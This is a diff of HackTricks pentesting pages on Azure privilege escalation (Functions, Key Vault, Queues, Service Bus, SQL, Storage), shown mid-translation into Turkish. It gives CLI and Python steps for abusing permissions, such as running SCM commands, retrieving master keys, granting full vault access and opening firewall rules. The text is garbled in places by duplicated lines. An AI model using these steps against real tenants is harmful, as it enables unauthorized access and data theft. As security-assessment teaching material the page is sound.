ftps://waws-prod-yq1-005dr.ftp.azurewebsites.windows.net/site/wwwroot/
ftps://waws-prod-yq1-005dr.ftp.azurewebsites.windows.net/site/wwwroot/
# Some commands
ls # List
get ./function_app.py -o /tmp/ # Download function_app.py in /tmp
put /tmp/function_app.py -o /site/wwwroot/function_app.py # Upload file and deploy it
```
_Note that the **FTP username** is usually in the format \<app-name>\\$\<app-name>._
_Not edin ki **FTP kullanıcı adı** genellikle \<app-name>\\$\<app-name> formatındadır._
### Microsoft.Web/sites/publish/Action
According to [**the docs**](https://github.com/projectkudu/kudu/wiki/REST-API#command), this permission allows to **execute commands inside the SCM server** which could be used to modify the source code of the application:
[**belgelere**](https://github.com/projectkudu/kudu/wiki/REST-API#command) göre, bu izin **SCM sunucusu içinde komutları çalıştırmaya** olanak tanır ve bu, uygulamanın kaynak kodunu değiştirmek için kullanılabilir:
```bash
az rest --method POST \
--resource "https://management.azure.com/" \
--url "https://newfuncttest123.scm.azurewebsites.net/api/command" \
--body '{"command": "echo Hello World", "dir": "site\\repository"}' --debug
--resource "https://management.azure.com/" \
--url "https://newfuncttest123.scm.azurewebsites.net/api/command" \
--body '{"command": "echo Hello World", "dir": "site\\repository"}' --debug
```
### Microsoft.Web/sites/hostruntime/vfs/read
This permission allows to **read the source code** of the app through the VFS:
Bu izin, VFS aracılığıyla uygulamanın **kaynak kodunu okumaya** olanak tanır:
```bash
az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
```
### Microsoft.Web/sites/functions/token/action
With this permission it's possible to [get the **admin token**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) which can be later used to retrieve the **master key** and therefore access and modify the function's code:
Bu izinle, daha sonra **master key**'i almak ve böylece fonksiyonun koduna erişmek ve değiştirmek için kullanılabilecek [**admin token**'ı](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) almak mümkündür:
```bash
# Get admin token
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/admin/token?api-version=2024-04-01" \
--headers '{"Content-Type": "application/json"}' \
--debug
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/admin/token?api-version=2024-04-01" \
--headers '{"Content-Type": "application/json"}' \
--debug
# Get master key
curl "https://<app-name>.azurewebsites.net/admin/host/systemkeys/_master" \
-H "Authorization: Bearer <token>"
-H "Authorization: Bearer <token>"
```
### Microsoft.Web/sites/config/write, (Microsoft.Web/sites/functions/properties/read)
This permissions allows to **enable functions** that might be disabled (or disable them).
Bu izinler, **devre dışı bırakılmış olabilecek fonksiyonları etkinleştirmeye** (veya devre dışı bırakmaya) olanak tanır.
```bash
# Enable a disabled function
az functionapp config appsettings set \
--name <app-name> \
--resource-group <res-group> \
--settings "AzureWebJobs.http_trigger1.Disabled=false"
--name <app-name> \
--resource-group <res-group> \
--settings "AzureWebJobs.http_trigger1.Disabled=false"
```
It's also possible to see if a function is enabled or disabled in the following URL (using the permission in parenthesis):
Aşağıdaki URL'de bir fonksiyonun etkin veya devre dışı olup olmadığını görmek de mümkündür (parantez içindeki izinleri kullanarak):
```bash
az rest --url "https://management.azure.com/subscriptions/<subscripntion-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/<func-name>/properties/state?api-version=2024-04-01"
```
### Microsoft.Web/sites/config/write, Microsoft.Web/sites/config/list/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/read)
With these permissions it's possible to **modify the container run by a function app** configured to run a container. This would allow an attacker to upload a malicious azure function container app to docker hub (for example) and make the function execute it.
Bu izinlerle, **bir konteyneri çalıştırmak üzere yapılandırılmış bir fonksiyon uygulaması tarafından çalıştırılan konteyneri değiştirmek** mümkündür. Bu, bir saldırganın kötü niyetli bir azure fonksiyon konteyner uygulamasını docker hub'a (örneğin) yüklemesine ve fonksiyonun bunu çalıştırmasına olanak tanır.
```bash
az functionapp config container set --name <app-name> \
--resource-group <res-group> \
--image "mcr.microsoft.com/azure-functions/dotnet8-quickstart-demo:1.0"
--resource-group <res-group> \
--image "mcr.microsoft.com/azure-functions/dotnet8-quickstart-demo:1.0"
```
### Microsoft.Web/sites/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/managedEnvironments/join/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/operationresults/read)
With these permissions it's possible to **attach a new user managed identity to a function**. If the function was compromised this would allow to escalate privileges to any user managed identity.
Bu izinlerle, **bir işleve yeni bir kullanıcı yönetilen kimlik eklemek** mümkündür. Eğer işlev tehlikeye atıldıysa, bu herhangi bir kullanıcı yönetilen kimliğine yetki yükseltmeye olanak tanır.
```bash
az functionapp identity assign \
--name <app-name> \
--resource-group <res-group> \
--identities /subscriptions/<subs-id>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>
--name <app-name> \
--resource-group <res-group> \
--identities /subscriptions/<subs-id>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>
```
### Uzaktan Hata Ayıklama
### Remote Debugging
It's also possible to connect to debug a running Azure function as [**explained in the docs**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). However, by default Azure will turn this option to off in 2 days in case the developer forgets to avoid leaving vulnerable configurations.
It's possible to check if a Function has debugging enabled with:
Çalışan bir Azure fonksiyonunu hata ayıklamak için bağlanmak da mümkündür, [**belgelerde açıklandığı gibi**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). Ancak, varsayılan olarak Azure, geliştiricinin savunmasız yapılandırmalar bırakmayı unuttuğu durumlarda bu seçeneği 2 gün içinde kapatacaktır.
Bir Fonksiyonun hata ayıklamanın etkin olup olmadığını kontrol etmek mümkündür:
```bash
az functionapp show --name <app-name> --resource-group <res-group>
```
Having the permission `Microsoft.Web/sites/config/write` it's also possible to put a function in debugging mode (the following command also requires the permissions `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` and `Microsoft.Web/sites/Read`).
`Microsoft.Web/sites/config/write` iznine sahip olmak, bir işlevi hata ayıklama moduna koymayı da mümkün kılar (aşağıdaki komut ayrıca `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` ve `Microsoft.Web/sites/Read` izinlerini de gerektirir).
```bash
az functionapp config set --remote-debugging-enabled=True --name <app-name> --resource-group <res-group>
```
### Github reposunu değiştir
### Change Github repo
I tried changing the Github repo from where the deploying is occurring by executing the following commands but even if it did change, **the new code was not loaded** (probably because it's expecting the Github Action to update the code).\
Moreover, the **managed identity federated credential wasn't updated** allowing the new repository, so it looks like this isn't very useful.
Dağıtımın gerçekleştiği Github reposunu değiştirmek için aşağıdaki komutları çalıştırdım ama değişse bile, **yeni kod yüklenmedi** (muhtemelen Github Action'ın kodu güncellemesini beklediği için).\
Ayrıca, **yönetilen kimlik federasyon kimliği güncellenmedi** ve yeni depoya izin vermedi, bu yüzden bu pek faydalı görünmüyor.
```bash
# Remove current
az functionapp deployment source delete \
--name funcGithub \
--resource-group Resource_Group_1
--name funcGithub \
--resource-group Resource_Group_1
# Load new public repo
az functionapp deployment source config \
--name funcGithub \
--resource-group Resource_Group_1 \
--repo-url "https://github.com/orgname/azure_func3" \
--branch main --github-action true
--name funcGithub \
--resource-group Resource_Group_1 \
--repo-url "https://github.com/orgname/azure_func3" \
--branch main --github-action true
```
{{#include ../../../banners/hacktricks-training.md}}

22
src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
View File

@@ -4,7 +4,7 @@
## Azure Key Vault
For more information about this service check:
Bu hizmet hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/keyvault.md
@@ -12,8 +12,7 @@ For more information about this service check:
### Microsoft.KeyVault/vaults/write
An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC).
Bu izne sahip bir saldırgan, bir anahtar kasasının politikasını değiştirebilecektir (anahtar kasası, RBAC yerine erişim politikalarını kullanıyor olmalıdır).
```bash
# If access policies in the output, then you can abuse it
az keyvault show --name <vault-name>
@@ -23,16 +22,11 @@ az ad signed-in-user show --query id --output tsv
# Assign all permissions
az keyvault set-policy \
--name <vault-name> \
--object-id <your-object-id> \
--key-permissions all \
--secret-permissions all \
--certificate-permissions all \
--storage-permissions all
--name <vault-name> \
--object-id <your-object-id> \
--key-permissions all \
--secret-permissions all \
--certificate-permissions all \
--storage-permissions all
```
{{#include ../../../banners/hacktricks-training.md}}

40
src/pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md
View File

@@ -4,7 +4,7 @@
## Queue
For more information check:
Daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-queue-enum.md
@@ -12,50 +12,41 @@ For more information check:
### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read`
An attacker with this permission can peek messages from an Azure Storage Queue. This allows the attacker to view the content of messages without marking them as processed or altering their state. This could lead to unauthorized access to sensitive information, enabling data exfiltration or gathering intelligence for further attacks.
Bu izne sahip bir saldırgan, bir Azure Storage Queue'dan mesajları önizleyebilir. Bu, saldırgana mesajların içeriğini işlenmiş olarak işaretlemeden veya durumlarını değiştirmeden görüntüleme imkanı tanır. Bu, hassas bilgilere yetkisiz erişime yol açabilir ve veri sızdırma veya daha fazla saldırıin istihbarat toplama olanağı sağlayabilir.
```bash
az storage message peek --queue-name <queue_name> --account-name <storage_account>
```
**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
**Potansiyel Etki**: Yetkisiz kullanıcılar veya hizmetler tarafından kuyruğa yetkisiz erişim, mesajların ifşası veya kuyruk manipülasyonu.
### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/process/action`
With this permission, an attacker can retrieve and process messages from an Azure Storage Queue. This means they can read the message content and mark it as processed, effectively hiding it from legitimate systems. This could lead to sensitive data being exposed, disruptions in how messages are handled, or even stopping important workflows by making messages unavailable to their intended users.
Bu izinle, bir saldırgan Azure Storage Queue'dan mesajları alabilir ve işleyebilir. Bu, mesaj içeriğini okuyabilecekleri ve işlenmiş olarak işaretleyebilecekleri anlamına gelir, bu da onu meşru sistemlerden gizler. Bu, hassas verilerin ifşa edilmesine, mesajların işlenme şeklinde kesintilere veya mesajları hedef kullanıcılarına ulaştırmamayı sağlayarak önemli iş akışlarının durmasına yol açabilir.
```bash
az storage message get --queue-name <queue_name> --account-name <storage_account>
```
### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action`
With this permission, an attacker can add new messages to an Azure Storage Queue. This allows them to inject malicious or unauthorized data into the queue, potentially triggering unintended actions or disrupting downstream services that process the messages.
Bu izinle, bir saldırgan Azure Storage Queue'ya yeni mesajlar ekleyebilir. Bu, kötü niyetli veya yetkisiz verilerin kuyruğa enjekte edilmesine olanak tanır ve bu da istenmeyen eylemleri tetikleyebilir veya mesajları işleyen aşağı akış hizmetlerini kesintiye uğratabilir.
```bash
az storage message put --queue-name <queue-name> --content "Injected malicious message" --account-name <storage-account>
```
### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write`
This permission allows an attacker to add new messages or update existing ones in an Azure Storage Queue. By using this, they could insert harmful content or alter existing messages, potentially misleading applications or causing undesired behaviors in systems that rely on the queue.
Bu izin, bir saldırganın Azure Storage Queue'da yeni mesajlar eklemesine veya mevcut olanları güncellemesine olanak tanır. Bunu kullanarak, zararlı içerik ekleyebilir veya mevcut mesajları değiştirebilir, bu da uygulamaları yanıltabilir veya kuyruğa bağımlı sistemlerde istenmeyen davranışlara neden olabilir.
```bash
az storage message put --queue-name <queue-name> --content "Injected malicious message" --account-name <storage-account>
#Update the message
az storage message update --queue-name <queue-name> \
--id <message-id> \
--pop-receipt <pop-receipt> \
--content "Updated message content" \
--visibility-timeout <timeout-in-seconds> \
--account-name <storage-account>
--id <message-id> \
--pop-receipt <pop-receipt> \
--content "Updated message content" \
--visibility-timeout <timeout-in-seconds> \
--account-name <storage-account>
```
### Action: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
Bu izin, bir saldırganın depolama hesabı içinde kuyruklar ve bunların özelliklerini oluşturmasına veya değiştirmesine olanak tanır. Yetkisiz kuyruklar oluşturmak, meta verileri değiştirmek veya erişim kontrol listelerini (ACL'ler) değiştirerek erişimi vermek veya kısıtlamak için kullanılabilir. Bu yetenek, iş akışlarını bozabilir, kötü niyetli veriler enjekte edebilir, hassas bilgileri dışarı sızdırabilir veya daha fazla saldırıyı mümkün kılmak için kuyruk ayarlarını manipüle edebilir.
```bash
az storage queue create --name <new-queue-name> --account-name <storage-account>
@@ -63,15 +54,10 @@ az storage queue metadata update --name <queue-name> --metadata key1=value1 key2
az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
```
## References
## Referanslar
- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
{{#include ../../../banners/hacktricks-training.md}}

144
src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
View File

@@ -4,16 +4,15 @@
## Service Bus
For more information check:
Daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-servicebus-enum.md
{{#endref}}
### Send Messages. Action: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OR `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action`
You can retrieve the `PrimaryConnectionString`, which acts as a credential for the Service Bus namespace. With this connection string, you can fully authenticate as the Service Bus namespace, enabling you to send messages to any queue or topic and potentially interact with the system in ways that could disrupt operations, impersonate valid users, or inject malicious data into the messaging workflow.
### Mesaj Gönder. Eylem: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` VEYA `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action`
`PrimaryConnectionString`'i alabilirsiniz, bu Service Bus ad alanı için bir kimlik bilgisi olarak işlev görür. Bu bağlantı dizesi ile, Service Bus ad alanı olarak tamamen kimlik doğrulaması yapabilir, herhangi bir kuyruk veya konuya mesaj gönderebilir ve potansiyel olarak sistemi, operasyonları kesintiye uğratacak, geçerli kullanıcıları taklit edecek veya mesajlaşma iş akışına kötü niyetli veriler enjekte edecek şekilde etkileşimde bulunabilirsiniz.
```python
#You need to install the following libraries
#pip install azure-servicebus
@@ -30,51 +29,51 @@ TOPIC_NAME = "<TOPIC_NAME>"
# Function to send a single message to a Service Bus topic
async def send_individual_message(publisher):
# Prepare a single message with updated content
single_message = ServiceBusMessage("Hacktricks-Training: Single Item")
# Send the message to the topic
await publisher.send_messages(single_message)
print("Sent a single message containing 'Hacktricks-Training'")
# Prepare a single message with updated content
single_message = ServiceBusMessage("Hacktricks-Training: Single Item")
# Send the message to the topic
await publisher.send_messages(single_message)
print("Sent a single message containing 'Hacktricks-Training'")
# Function to send multiple messages to a Service Bus topic
async def send_multiple_messages(publisher):
# Generate a collection of messages with updated content
message_list = [ServiceBusMessage(f"Hacktricks-Training: Item {i+1} in list") for i in range(5)]
# Send the entire collection of messages to the topic
await publisher.send_messages(message_list)
print("Sent a list of 5 messages containing 'Hacktricks-Training'")
# Generate a collection of messages with updated content
message_list = [ServiceBusMessage(f"Hacktricks-Training: Item {i+1} in list") for i in range(5)]
# Send the entire collection of messages to the topic
await publisher.send_messages(message_list)
print("Sent a list of 5 messages containing 'Hacktricks-Training'")
# Function to send a grouped batch of messages to a Service Bus topic
async def send_grouped_messages(publisher):
# Send a grouped batch of messages with updated content
async with publisher:
grouped_message_batch = await publisher.create_message_batch()
for i in range(10):
try:
# Append a message to the batch with updated content
grouped_message_batch.add_message(ServiceBusMessage(f"Hacktricks-Training: Item {i+1}"))
except ValueError:
# If batch reaches its size limit, handle by creating another batch
break
# Dispatch the batch of messages to the topic
await publisher.send_messages(grouped_message_batch)
print("Sent a batch of 10 messages containing 'Hacktricks-Training'")
# Send a grouped batch of messages with updated content
async with publisher:
grouped_message_batch = await publisher.create_message_batch()
for i in range(10):
try:
# Append a message to the batch with updated content
grouped_message_batch.add_message(ServiceBusMessage(f"Hacktricks-Training: Item {i+1}"))
except ValueError:
# If batch reaches its size limit, handle by creating another batch
break
# Dispatch the batch of messages to the topic
await publisher.send_messages(grouped_message_batch)
print("Sent a batch of 10 messages containing 'Hacktricks-Training'")
# Main function to execute all tasks
async def execute():
# Instantiate the Service Bus client with the connection string
async with ServiceBusClient.from_connection_string(
conn_str=NAMESPACE_CONNECTION_STR,
logging_enable=True) as sb_client:
# Create a topic sender for dispatching messages to the topic
publisher = sb_client.get_topic_sender(topic_name=TOPIC_NAME)
async with publisher:
# Send a single message
await send_individual_message(publisher)
# Send multiple messages
await send_multiple_messages(publisher)
# Send a batch of messages
await send_grouped_messages(publisher)
# Instantiate the Service Bus client with the connection string
async with ServiceBusClient.from_connection_string(
conn_str=NAMESPACE_CONNECTION_STR,
logging_enable=True) as sb_client:
# Create a topic sender for dispatching messages to the topic
publisher = sb_client.get_topic_sender(topic_name=TOPIC_NAME)
async with publisher:
# Send a single message
await send_individual_message(publisher)
# Send multiple messages
await send_multiple_messages(publisher)
# Send a batch of messages
await send_grouped_messages(publisher)
# Run the asynchronous execution
asyncio.run(execute())
@@ -82,11 +81,9 @@ print("Messages Sent")
print("----------------------------")
```
### Mesajları Al. Eylem: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` VEYA `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action`
### Recieve Messages. Action: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OR `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action`
You can retrieve the PrimaryConnectionString, which serves as a credential for the Service Bus namespace. Using this connection string, you can receive messages from any queue or subscription within the namespace, allowing access to potentially sensitive or critical data, enabling data exfiltration, or interfering with message processing and application workflows.
PrimaryConnectionString'i alabilirsiniz, bu Service Bus ad alanı için bir kimlik bilgisi olarak hizmet eder. Bu bağlantı dizesini kullanarak, ad alanındaki herhangi bir kuyruktan veya abonelikten mesaj alabilir, potansiyel olarak hassas veya kritik verilere erişim sağlayabilir, veri sızdırma işlemlerini gerçekleştirebilir veya mesaj işleme ve uygulama iş akışlarını etkileyebilirsiniz.
```python
#You need to install the following libraries
#pip install azure-servicebus
@@ -102,48 +99,45 @@ SUBSCRIPTION_NAME = "<TOPIC_SUBSCRIPTION_NAME>" #Topic Subscription
# Function to receive and process messages from a Service Bus subscription
async def receive_and_process_messages():
# Create a Service Bus client using the connection string
async with ServiceBusClient.from_connection_string(
conn_str=NAMESPACE_CONNECTION_STR,
logging_enable=True) as servicebus_client:
# Create a Service Bus client using the connection string
async with ServiceBusClient.from_connection_string(
conn_str=NAMESPACE_CONNECTION_STR,
logging_enable=True) as servicebus_client:
# Get the Subscription Receiver object for the specified topic and subscription
receiver = servicebus_client.get_subscription_receiver(
topic_name=TOPIC_NAME,
subscription_name=SUBSCRIPTION_NAME,
max_wait_time=5
)
# Get the Subscription Receiver object for the specified topic and subscription
receiver = servicebus_client.get_subscription_receiver(
topic_name=TOPIC_NAME,
subscription_name=SUBSCRIPTION_NAME,
max_wait_time=5
)
async with receiver:
# Receive messages with a defined maximum wait time and count
received_msgs = await receiver.receive_messages(
max_wait_time=5,
max_message_count=20
)
for msg in received_msgs:
print("Received: " + str(msg))
# Complete the message to remove it from the subscription
await receiver.complete_message(msg)
async with receiver:
# Receive messages with a defined maximum wait time and count
received_msgs = await receiver.receive_messages(
max_wait_time=5,
max_message_count=20
)
for msg in received_msgs:
print("Received: " + str(msg))
# Complete the message to remove it from the subscription
await receiver.complete_message(msg)
# Run the asynchronous message processing function
asyncio.run(receive_and_process_messages())
print("Message Receiving Completed")
print("----------------------------")
```
### `Microsoft.ServiceBus/namespaces/authorizationRules/write` & `Microsoft.ServiceBus/namespaces/authorizationRules/write`
If you have these permissions, you can escalate privileges by reading or creating shared access keys. These keys allow full control over the Service Bus namespace, including managing queues, topics, and sending/receiving messages, potentially bypassing role-based access controls (RBAC).
Bu izinlere sahipseniz, paylaşılan erişim anahtarlarını okuyarak veya oluşturarak ayrıcalıkları artırabilirsiniz. Bu anahtarlar, kuyrukları, konuları yönetme ve mesaj gönderme/alma dahil olmak üzere Service Bus ad alanı üzerinde tam kontrol sağlar ve potansiyel olarak rol tabanlı erişim kontrollerini (RBAC) atlayabilir.
```bash
az servicebus namespace authorization-rule update \
--resource-group <MyResourceGroup> \
--namespace-name <MyNamespace> \
--name RootManageSharedAccessKey \
--rights Manage Listen Send
--resource-group <MyResourceGroup> \
--namespace-name <MyNamespace> \
--name RootManageSharedAccessKey \
--rights Manage Listen Send
```
## References
## Referanslar
- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
@@ -152,7 +146,3 @@ az servicebus namespace authorization-rule update \
- https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
{{#include ../../../banners/hacktricks-training.md}}

106
src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
View File

@@ -4,7 +4,7 @@
## SQL Database Privesc
For more information about SQL Database check:
SQL Database hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-sql.md
@@ -12,104 +12,88 @@ For more information about SQL Database check:
### "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/write"
With these permissions, a user can perform privilege escalation by updating or creating Azure SQL servers and modifying critical configurations, including administrative credentials. This permission allows the user to update server properties, including the SQL server admin password, enabling unauthorized access or control over the server. They can also create new servers, potentially introducing shadow infrastructure for malicious purposes. This becomes particularly critical in environments where "Microsoft Entra Authentication Only" is disabled, as they can exploit SQL-based authentication to gain unrestricted access.
Bu izinlerle, bir kullanıcı Azure SQL sunucularını güncelleyerek veya oluşturarak ve kritik yapılandırmaları, yönetici kimlik bilgileri de dahil olmak üzere, değiştirerek ayrıcalık yükseltmesi gerçekleştirebilir. Bu izin, kullanıcının SQL sunucu yönetici şifresi de dahil olmak üzere sunucu özelliklerini güncellemesine olanak tanır ve yetkisiz erişim veya sunucu üzerinde kontrol sağlar. Ayrıca yeni sunucular oluşturabilirler, bu da kötü niyetli amaçlar için gölge altyapı oluşturma potansiyeli taşır. Bu, "Microsoft Entra Authentication Only" devre dışı bırakıldığında özellikle kritik hale gelir, çünkü SQL tabanlı kimlik doğrulamasını kullanarak sınırsız erişim elde edebilirler.
```bash
# Change the server password
az sql server update \
--name <server_name> \
--resource-group <resource_group_name> \
--admin-password <new_password>
--name <server_name> \
--resource-group <resource_group_name> \
--admin-password <new_password>
# Create a new server
az sql server create \
--name <new_server_name> \
--resource-group <resource_group_name> \
--location <location> \
--admin-user <admin_username> \
--admin-password <admin_password>
--name <new_server_name> \
--resource-group <resource_group_name> \
--location <location> \
--admin-user <admin_username> \
--admin-password <admin_password>
```
Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it:
Ayrıca, özel bir uç noktadan erişmek istiyorsanız, genel erişimin etkinleştirilmesi gereklidir, bunu etkinleştirmek için:
```bash
az sql server update \
--name <server-name> \
--resource-group <resource-group> \
--enable-public-network true
--name <server-name> \
--resource-group <resource-group> \
--enable-public-network true
```
### "Microsoft.Sql/servers/firewallRules/write"
An attacker can manipulate firewall rules on Azure SQL servers to allow unauthorized access. This can be exploited to open up the server to specific IP addresses or entire IP ranges, including public IPs, enabling access for malicious actors. This post-exploitation activity can be used to bypass existing network security controls, establish persistence, or facilitate lateral movement within the environment by exposing sensitive resources.
Bir saldırgan, Azure SQL sunucularındaki güvenlik duvarı kurallarını manipüle ederek yetkisiz erişime izin verebilir. Bu, sunucuyu belirli IP adreslerine veya tüm IP aralıklarına, kamu IP'leri de dahil olmak üzere, açmak için kullanılabilir ve kötü niyetli aktörler için erişim sağlanabilir. Bu sonrası istismar etkinliği, mevcut ağ güvenlik kontrollerini aşmak, kalıcılık sağlamak veya hassas kaynaklarıığa çıkararak ortamda yan hareketi kolaylaştırmak için kullanılabilir.
```bash
# Create Firewall Rule
az sql server firewall-rule create \
--name <new-firewall-rule-name> \
--server <server-name> \
--resource-group <resource-group> \
--start-ip-address <start-ip-address> \
--end-ip-address <end-ip-address>
--name <new-firewall-rule-name> \
--server <server-name> \
--resource-group <resource-group> \
--start-ip-address <start-ip-address> \
--end-ip-address <end-ip-address>
# Update Firewall Rule
az sql server firewall-rule update \
--name <firewall-rule-name> \
--server <server-name> \
--resource-group <resource-group> \
--start-ip-address <new-start-ip-address> \
--end-ip-address <new-end-ip-address>
--name <firewall-rule-name> \
--server <server-name> \
--resource-group <resource-group> \
--start-ip-address <new-start-ip-address> \
--end-ip-address <new-end-ip-address>
```
Additionally, `Microsoft.Sql/servers/outboundFirewallRules/delete` permission lets you delete a Firewall Rule.
NOTE: It is necesary to have the public access enabled
Ayrıca, `Microsoft.Sql/servers/outboundFirewallRules/delete` izni, bir Güvenlik Duvarı Kuralını silmenizi sağlar.
NOT: Kamu erişiminin etkinleştirilmesi gerekmektedir.
### ""Microsoft.Sql/servers/ipv6FirewallRules/write"
With this permission, you can create, modify, or delete IPv6 firewall rules on an Azure SQL Server. This could enable an attacker or authorized user to bypass existing network security configurations and gain unauthorized access to the server. By adding a rule that allows traffic from any IPv6 address, the attacker could open the server to external access."
Bu izinle, bir Azure SQL Sunucusunda IPv6 güvenlik duvarı kuralları oluşturabilir, değiştirebilir veya silebilirsiniz. Bu, bir saldırganın veya yetkili bir kullanıcının mevcut ağ güvenlik yapılandırmalarını atlamasına ve sunucuya yetkisiz erişim elde etmesine olanak tanıyabilir. Herhangi bir IPv6 adresinden gelen trafiğe izin veren bir kural ekleyerek, saldırgan sunucuyu dış erişime açabilir.
```bash
az sql server firewall-rule create \
--server <server_name> \
--resource-group <resource_group_name> \
--name <rule_name> \
--start-ip-address <start_ipv6_address> \
--end-ip-address <end_ipv6_address>
--server <server_name> \
--resource-group <resource_group_name> \
--name <rule_name> \
--start-ip-address <start_ipv6_address> \
--end-ip-address <end_ipv6_address>
```
Additionally, `Microsoft.Sql/servers/ipv6FirewallRules/delete` permission lets you delete a Firewall Rule.
NOTE: It is necesary to have the public access enabled
Ayrıca, `Microsoft.Sql/servers/ipv6FirewallRules/delete` izni, bir Güvenlik Duvarı Kuralını silmenizi sağlar.
NOT: Genel erişimin etkinleştirilmesi gerekmektedir.
### "Microsoft.Sql/servers/administrators/write" && "Microsoft.Sql/servers/administrators/read"
With this permissions you can privesc in an Azure SQL Server environment accessing to SQL databases and retrieven critical information. Using the the command below, an attacker or authorized user can set themselves or another account as the Azure AD administrator. If "Microsoft Entra Authentication Only" is enabled you are albe to access the server and its instances. Here's the command to set the Azure AD administrator for an SQL server:
Bu izinlerle, Azure SQL Server ortamında SQL veritabanlarına erişerek kritik bilgilere ulaşabilirsiniz. Aşağıdaki komutu kullanarak, bir saldırgan veya yetkili kullanıcı kendisini veya başka bir hesabı Azure AD yöneticisi olarak ayarlayabilir. "Microsoft Entra Authentication Only" etkinleştirildiğinde, sunucuya ve örneklerine erişim sağlayabilirsiniz. İşte bir SQL sunucusu için Azure AD yöneticisini ayarlamak için komut:
```bash
az sql server ad-admin create \
--server <server_name> \
--resource-group <resource_group_name> \
--display-name <admin_display_name> \
--object-id <azure_subscribtion_id>
--server <server_name> \
--resource-group <resource_group_name> \
--display-name <admin_display_name> \
--object-id <azure_subscribtion_id>
```
### "Microsoft.Sql/servers/azureADOnlyAuthentications/write" && "Microsoft.Sql/servers/azureADOnlyAuthentications/read"
With these permissions, you can configure and enforce "Microsoft Entra Authentication Only" on an Azure SQL Server, which could facilitate privilege escalation in certain scenarios. An attacker or an authorized user with these permissions can enable or disable Azure AD-only authentication.
Bu izinlerle, belirli senaryolarda ayrıcalık yükseltmeyi kolaylaştırabilecek şekilde bir Azure SQL Sunucusu'nda "Microsoft Entra Authentication Only" yapılandırabilir ve uygulayabilirsiniz. Bu izinlere sahip bir saldırgan veya yetkili bir kullanıcı, Azure AD yalnızca kimlik doğrulamasını etkinleştirebilir veya devre dışı bırakabilir.
```bash
#Enable
az sql server azure-ad-only-auth enable \
--server <server_name> \
--resource-group <resource_group_name>
--server <server_name> \
--resource-group <resource_group_name>
#Disable
az sql server azure-ad-only-auth disable \
--server <server_name> \
--resource-group <resource_group_name>
--server <server_name> \
--resource-group <resource_group_name>
```
{{#include ../../../banners/hacktricks-training.md}}

116
src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
View File

@@ -4,7 +4,7 @@
## Storage Privesc
For more information about storage check:
Depolama hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-storage.md
@@ -12,26 +12,21 @@ For more information about storage check:
### Microsoft.Storage/storageAccounts/listkeys/action
A principal with this permission will be able to list (and the secret values) of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts.
